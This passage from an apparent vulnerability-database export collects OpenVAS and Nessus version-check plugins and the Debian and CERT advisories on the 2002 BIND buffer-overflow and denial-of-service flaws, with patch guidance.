2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00233\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\", \"CVE-2002-0029\");\n script_name( \"HP-UX Update for BIND HPSBUX00233\");\n\n script_summary(\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : 
tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv812.INETSVCS-BIND\", revision:\"B.11.00.01.004\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28449'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_29634'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28450'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:39:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "Check for the Version of BIND", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835099", "type": "openvas", "title": "HP-UX Update for BIND HPSBUX00233", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for BIND HPSBUX00233\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Execution of arbitrary code\n denial of service (DoS).\";\ntag_affected = \"BIND on\n HP-UX releases B.10.10, B.10.20, B.11.00, B.11.04 (VVOS), and B.11.11 \n running BIND 4.9.7 or BIND-8.1.2.\";\ntag_insight = \"A vulnerability in BIND DNS resolver libraries may allow remote attackers to \n execute arbitrary code with the privileges of the user running named, \n typically root or to create a denial of service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00957868-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835099\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 
2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"00233\");\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\", \"CVE-2002-0029\");\n script_name( \"HP-UX Update for BIND HPSBUX00233\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of BIND\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"BINDv812.INETSVCS-BIND\", revision:\"B.11.00.01.004\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_28449'], rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", patch_list:['PHNE_29634'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"InternetSrvcs.INETSVCS-RUN\", 
patch_list:['PHNE_28450'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:37", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 196-1 security@debian.org\nhttp://www.debian.org/security/ Daniel Jacobowitz\nNovember 14th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-1219 CAN-2002-1220 CAN-2002-1221\nCERT advisory : VU#844360 VU#852283 VU#229595 VU#542971\n\n[Bind version 9, the bind9 package, is not affected by these problems.]\n\nISS X-Force has discovered several serious vulnerabilities in the Berkeley\nInternet Name Domain Server (BIND). BIND is the most common implementation\nof the DNS (Domain Name Service) protocol, which is used on the vast\nmajority of DNS servers on the Internet. DNS is a vital Internet protocol\nthat maintains a database of easy-to-remember domain names (host names) and\ntheir corresponding numerical IP addresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in mid-October.\nDistributors of Open Source operating systems, including Debian, were\nnotified of these vulnerabilities via CERT about 12 hours before the release\nof the advisories on November 12th. 
This notification did not include any\ndetails that allowed us to identify the vulnerable code, much less prepare\ntimely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with only\ndescriptions of the vulnerabilities, without any patches. Even though there\nwere no signs that these exploits are known to the black-hat community, and\nthere were no reports of active attacks, such attacks could have been\ndeveloped in the meantime - with no fixes available.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in handling\nthis problem. Hopefully this will not become a model for dealing with\nsecurity issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities:\n\n1. CAN-2002-1219: A buffer overflow in BIND 8 versions 8.3.3 and earlier\n allows a remote attacker to execute arbitrary code via a certain DNS\n server response containing SIG resource records (RR). This buffer\n overflow can be exploited to obtain access to the victim host under the\n account the named process is running with, usually root.\n\n2. CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3 allows a remote\n attacker to cause a denial of service (termination due to assertion\n failure) via a request for a subdomain that does not exist, with an OPT\n resource record with a large UDP payload size.\n\n3. CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows a remote attacker\n to cause a denial of service (crash) via SIG RR elements with invalid\n expiry times, which are removed from the internal BIND database and later\n cause a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the current\nstable distribution (woody), in 8.2.3-0.potato.3 for the previous stable\ndistribution (potato) and in version 8.3.3-3 for the unstable distribution\n(sid). 
The fixed packages for unstable will enter the archive today.\n\nWe recommend that you upgrade your bind package immediately, update to\nbind9, or switch to another DNS server implementation.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian 2.2 (oldstable)\n- ----------------------\n\n Oldstable was released for alpha, arm, i386, m68k, powerpc and sparc.\n\nDebian 3.0 (stable)\n- -------------------\n\n Stable was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2002-11-14T00:00:00", "published": "2002-11-14T00:00:00", "id": "DEBIAN:DSA-196-1:62A00", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00120.html", "title": "[SECURITY] [DSA-196-1] New BIND packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-03-01T01:25:26", "description": "The remote name server, according to its version number, is affected\nby the following 
vulnerabilities :\n\n- When running the recursive DNS functionality, this server is\nvulnerable to a buffer overflow attack that may let an attacker\nexecute arbitrary code on the remote host. \n\n- It is vulnerable to a denial of service attack (crash) via SIG RR\nelements with invalid expiry times. \n\n- It is vulnerable to a denial of service attack when a DNS lookup is\nrequested on a nonexistent sub-domain of a valid domain and an OPT\nresource record with a large UDP payload is attached, the server may\nfail.", "edition": 26, "published": "2002-03-08T00:00:00", "title": "ISC BIND < 8.3.4 Multiple Remote Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:isc:bind"], "id": "BIND_DNSSTORM.NASL", "href": "https://www.tenable.com/plugins/nessus/10886", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security \n# Ian Koenig <ian@carmichaelsecurity.com> (nb: this domain no longer exists)\n# Added BugtraqID and CVE\n# Updated to handle two specific types of attacks instead of just a general\n# statement of \"vulnerable to DNS storm attacks\".\n# \n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10886);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_bugtraq_id(6159, 6160, 6161);\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2002:044\");\n \n script_name(english:\"ISC BIND < 8.3.4 Multiple Remote Vulnerabilities\");\n script_summary(english:\"Checks the remote BIND version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to use the remote name server to break into the\nremote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote name server, according to its version number, is affected\nby the 
following vulnerabilities :\n\n- When running the recursive DNS functionality, this server is\nvulnerable to a buffer overflow attack that may let an attacker\nexecute arbitrary code on the remote host. \n\n- It is vulnerable to a denial of service attack (crash) via SIG RR\nelements with invalid expiry times. \n\n- It is vulnerable to a denial of service attack when a DNS lookup is\nrequested on a nonexistent sub-domain of a valid domain and an OPT\nresource record with a large UDP payload is attached, the server may\nfail.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to BIND 8.3.4 or newer\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/03/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/11/12\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english: \"DNS\");\n\n script_dependencie(\"bind_version.nasl\");\n script_require_keys(\"bind/version\");\n exit(0);\n}\n\nvers = get_kb_item(\"bind/version\");\nif(!vers)exit(0);\n\nif(ereg(string:vers,\n\t pattern:\"^8\\.(([0-1].*)|(2\\.[0-6])|(3\\.0\\.[0-3])).*\"))security_hole(53);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:49", "description": "[Bind version 9, the bind9 package, is not affected by these\nproblems.]\n\nISS X-Force has discovered several serious vulnerabilities in the\nBerkeley Internet Name 
Domain Server (BIND). BIND is the most common\nimplementation of the DNS (Domain Name Service) protocol, which is\nused on the vast majority of DNS servers on the Internet. DNS is a\nvital Internet protocol that maintains a database of easy-to-remember\ndomain names (host names) and their corresponding numerical IP\naddresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in\nmid-October. Distributors of Open Source operating systems, including\nDebian, were notified of these vulnerabilities via CERT about 12 hours\nbefore the release of the advisories on November 12th. This\nnotification did not include any details that allowed us to identify\nthe vulnerable code, much less prepare timely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with\nonly descriptions of the vulnerabilities, without any patches. Even\nthough there were no signs that these exploits are known to the\nblack-hat community, and there were no reports of active attacks, such\nattacks could have been developed in the meantime - with no fixes\navailable.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in\nhandling this problem. Hopefully this will not become a model for\ndealing with security issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities :\n\n - CAN-2002-1219: A buffer overflow in BIND 8 versions\n 8.3.3 and earlier allows a remote attacker to execute\n arbitrary code via a certain DNS server response\n containing SIG resource records (RR). 
This buffer\n overflow can be exploited to obtain access to the victim\n host under the account the named process is running\n with, usually root.\n - CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3\n allows a remote attacker to cause a denial of service\n (termination due to assertion failure) via a request for\n a subdomain that does not exist, with an OPT resource\n record with a large UDP payload size.\n\n - CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows\n a remote attacker to cause a denial of service (crash)\n via SIG RR elements with invalid expiry times, which are\n removed from the internal BIND database and later cause\n a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the\ncurrent stable distribution (woody), in version 8.2.3-0.potato.3 for\nthe previous stable distribution (potato) and in version 8.3.3-3 for\nthe unstable distribution (sid). The fixed packages for unstable will\nenter the archive today.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-196-1 : bind - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:bind"], "id": "DEBIAN_DSA-196.NASL", "href": "https://www.tenable.com/plugins/nessus/15033", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-196. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15033);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0029\", \"CVE-2002-1219\", \"CVE-2002-1220\", \"CVE-2002-1221\");\n script_bugtraq_id(6159, 6160, 6161);\n script_xref(name:\"CERT\", value:\"229595\");\n script_xref(name:\"CERT\", value:\"542971\");\n script_xref(name:\"CERT\", value:\"581682\");\n script_xref(name:\"CERT\", value:\"844360\");\n script_xref(name:\"CERT\", value:\"852283\");\n script_xref(name:\"DSA\", value:\"196\");\n\n script_name(english:\"Debian DSA-196-1 : bind - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"[Bind version 9, the bind9 package, is not affected by these\nproblems.]\n\nISS X-Force has discovered several serious vulnerabilities in the\nBerkeley Internet Name Domain Server (BIND). BIND is the most common\nimplementation of the DNS (Domain Name Service) protocol, which is\nused on the vast majority of DNS servers on the Internet. DNS is a\nvital Internet protocol that maintains a database of easy-to-remember\ndomain names (host names) and their corresponding numerical IP\naddresses.\n\nCircumstantial evidence suggests that the Internet Software Consortium\n(ISC), maintainers of BIND, was made aware of these issues in\nmid-October. Distributors of Open Source operating systems, including\nDebian, were notified of these vulnerabilities via CERT about 12 hours\nbefore the release of the advisories on November 12th. 
This\nnotification did not include any details that allowed us to identify\nthe vulnerable code, much less prepare timely fixes.\n\nUnfortunately ISS and the ISC released their security advisories with\nonly descriptions of the vulnerabilities, without any patches. Even\nthough there were no signs that these exploits are known to the\nblack-hat community, and there were no reports of active attacks, such\nattacks could have been developed in the meantime - with no fixes\navailable.\n\nWe can all express our regret at the inability of the ironically named\nInternet Software Consortium to work with the Internet community in\nhandling this problem. Hopefully this will not become a model for\ndealing with security issues in the future.\n\nThe Common Vulnerabilities and Exposures (CVE) project identified the\nfollowing vulnerabilities :\n\n - CAN-2002-1219: A buffer overflow in BIND 8 versions\n 8.3.3 and earlier allows a remote attacker to execute\n arbitrary code via a certain DNS server response\n containing SIG resource records (RR). This buffer\n overflow can be exploited to obtain access to the victim\n host under the account the named process is running\n with, usually root.\n - CAN-2002-1220: BIND 8 versions 8.3.x through 8.3.3\n allows a remote attacker to cause a denial of service\n (termination due to assertion failure) via a request for\n a subdomain that does not exist, with an OPT resource\n record with a large UDP payload size.\n\n - CAN-2002-1221: BIND 8 versions 8.x through 8.3.3 allows\n a remote attacker to cause a denial of service (crash)\n via SIG RR elements with invalid expiry times, which are\n removed from the internal BIND database and later cause\n a null dereference.\n\nThese problems have been fixed in version 8.3.3-2.0woody1 for the\ncurrent stable distribution (woody), in version 8.2.3-0.potato.3 for\nthe previous stable distribution (potato) and in version 8.3.3-3 for\nthe unstable distribution (sid). 
The fixed packages for unstable will\nenter the archive today.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2002/dsa-196\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bind package immediately, update to bind9, or switch to\nanother DNS server implementation.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2002/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"bind\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", 
prefix:\"bind-dev\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"bind-doc\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"dnsutils\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"task-dns-server\", reference:\"8.2.3-0.potato.3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind\", reference:\"8.3.3-2.0woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind-dev\", reference:\"8.3.3-2.0woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"bind-doc\", reference:\"8.3.3-2.0woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-0029", "CVE-2002-1220", "CVE-2002-1219", "CVE-2002-1221"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\nCERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND\r\n\r\n Original release date: November 14, 2002\r\n Last revised: --\r\n Source: CERT/CC\r\n\r\n A complete revision history can be found at the end of this file.\r\n\r\nSystems Affected\r\n\r\n * Systems running various versions of BIND 4 and BIND 8\r\n\r\n Because the normal operation of most services on the Internet\r\n depends on the proper operation of DNS servers, other services\r\n could be affected if these vulnerabilities are exploited.\r\n\r\nOverview\r\n\r\n Multiple vulnerabilities with varying impacts have been found in BIND,\r\n the popular domain name server and client library software package\r\n from the Internet Software Consortium (ISC).\r\n\r\n Some of these vulnerabilities may allow remote attackers to execute\r\n arbitrary code with the privileges of the user running named,\r\n (typically root), or with the 
privileges of vulnerable client\r\n applications. The other vulnerabilities will allow remote attackers to\r\n disrupt the normal operation of DNS name service running on victim\r\n servers.\r\n\r\nI. Description\r\n\r\n Multiple vulnerabilities have been found in BIND (Berkeley Internet\r\n Name Domain). Some of these vulnerabilities (VU#852283, VU#844360) may\r\n allow remote attackers to execute arbitrary code with the privileges\r\n of the user running named, typically root. The other vulnerabilities\r\n (VU#229595, VU#581682) will allow remote attackers to disrupt the\r\n normal operation of your name server, possibly causing a crash.\r\n\r\nBIND DNS Server Vulnerabilities\r\n\r\nVU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n This vulnerability is a buffer overflow in named. It can occur when\r\n responses are constructed using previously-cached malformed SIG\r\n records. (SIG records are typically associated with cryptographically\r\n signed DNS data.) Exploitation of the vulnerability can lead to\r\n arbitrary code execution as the named uid, typically root.\r\n\r\n The following versions of BIND are affected:\r\n\r\n - BIND versions 4.9.5 to 4.9.10\r\n - BIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3\r\n\r\nVU#229595 - Overly large OPT record assertion\r\n\r\n ISC BIND 8 fails to properly handle DNS lookups for non-existent\r\n sub-domains when overly large OPT resource records are appended to a\r\n query. When a non-existent domain (NXDOMAIN) response is constructed\r\n by a victim nameserver, an assertion may be triggered if the client\r\n passes a large UDP buffer size. 
This assertion will cause the running\r\n named to exit.\r\n\r\n The following versions of BIND are affected:\r\n \r\n - BIND versions 8.3.0 to 8.3.3\r\n\r\nVU#581682 - ISC BIND 8 fails to properly de-reference cache SIG RR elements\r\nwith invalid expiry times from the internal database\r\n\r\n ISC's description of this vulnerability states:\r\n\r\n It is possible to de-reference a NULL pointer for certain signature\r\n expire values. \r\n\r\n The following versions of BIND are affected:\r\n\r\n - BIND versions 8.2 to 8.2.6\r\n - BIND versions 8.3.0 to 8.3.3.\r\n\r\nBIND DNS Resolver Vulnerabilities\r\n\r\nVU#844360 - Domain Name System (DNS) stub resolver libraries vulnerable to\r\nbuffer overflows via network name or address lookups\r\n\r\n An attacker could execute arbitrary code with the privileges of the\r\n application that made the request or cause a denial of service. The\r\n attacker would need to control the contents of DNS responses, possibly\r\n by spoofing responses or gaining control of a DNS server.\r\n\r\n These vulnerabilities are distinct from the issues discussed in\r\n CA-2002-19. The following DNS stub resolver libraries are known to be\r\n affected:\r\n\r\n - BIND 4.9.2 through 4.9.10\r\n\r\n The status of other resolver libraries derived from BIND 4 such as BSD\r\n libc, GNU glibc, and those used by System V UNIX systems is currently\r\n unknown. Additionally, these issues are mapped to CVE as follows.\r\n\r\n VU#852283 - CAN-2002-1219\r\n VU#229595 - CAN-2002-1220\r\n VU#581682 - CAN-2002-1221\r\n VU#844360 - CAN-2002-0029\r\n\r\nII. 
Impact\r\n\r\nVU#852283 - Cached malformed SIG record buffer overflow\r\n\r\n A remote attacker could execute arbitrary code on the nameserver with\r\n the privileges of the named uid, typically root.\r\n\r\nVU#229595 - Overly large OPT record assertion\r\n\r\n A remote attacker can disrupt the normal operation of your name\r\n server, possibly causing a crash.\r\n\r\nVU#581682 - ISC BIND 8 fails to properly de-reference cache SIG RR elements\r\nwith invalid expiry times from the internal database\r\n\r\n A remote attacker can disrupt the normal operation of your name\r\n server, possibly causing a crash.\r\n\r\nVU#844360 - Domain Name System (DNS) stub resolver libraries vulnerable to\r\nbuffer overflows via network name or address lookups\r\n\r\n An attacker could execute arbitrary code with the privileges of the\r\n application that made the request or cause a denial of service. The\r\n attacker would need to control the contents of DNS responses, possibly\r\n by spoofing responses or gaining control of a DNS server.\r\n\r\nIII. Solution\r\n\r\nApply a patch from your vendor.\r\n\r\n Appendix A contains information provided by vendors for this advisory.\r\n As vendors report new information to the CERT/CC, we will update this\r\n section and note the changes in our revision history. 
If a particular\r\n vendor is not listed below, we have not received their comments.\r\n Please contact your vendor directly.\r\n\r\n If a vendor patch is not available, you may wish to consider applying\r\n the patches ISC has produced:\r\n\r\n BIND 8.3.3 - http://www.isc.org/products/BIND/patches/bind833.diff\r\n\r\n BIND 8.2.6 - http://www.isc.org/products/BIND/patches/bind826.diff\r\n\r\n BIND 4.9.10 - http://www.isc.org/products/BIND/patches/bind4910.diff\r\n\r\n For VU#844360, the BIND 4 libresolv buffer overflows, an upgrade to a\r\n corrected version of the DNS resolver libraries will be required.\r\n\r\n Note that DNS resolver libraries can be used by multiple applications\r\n on most systems. It may be necessary to upgrade or apply multiple\r\n patches and then recompile statically linked applications.\r\n\r\n Applications that are statically linked must be recompiled using\r\n patched resolver libraries. Applications that are dynamically linked\r\n do not need to be recompiled; however, running services need to be\r\n restarted in order to use the patched resolver libraries.\r\n\r\n System administrators should consider the following process when\r\n addressing this issue:\r\n\r\n 1. Patch or obtain updated resolver libraries.\r\n 2. Restart any dynamically linked services that use the resolver\r\n libraries.\r\n 3. Recompile any statically linked applications using the patched or\r\n updated resolver 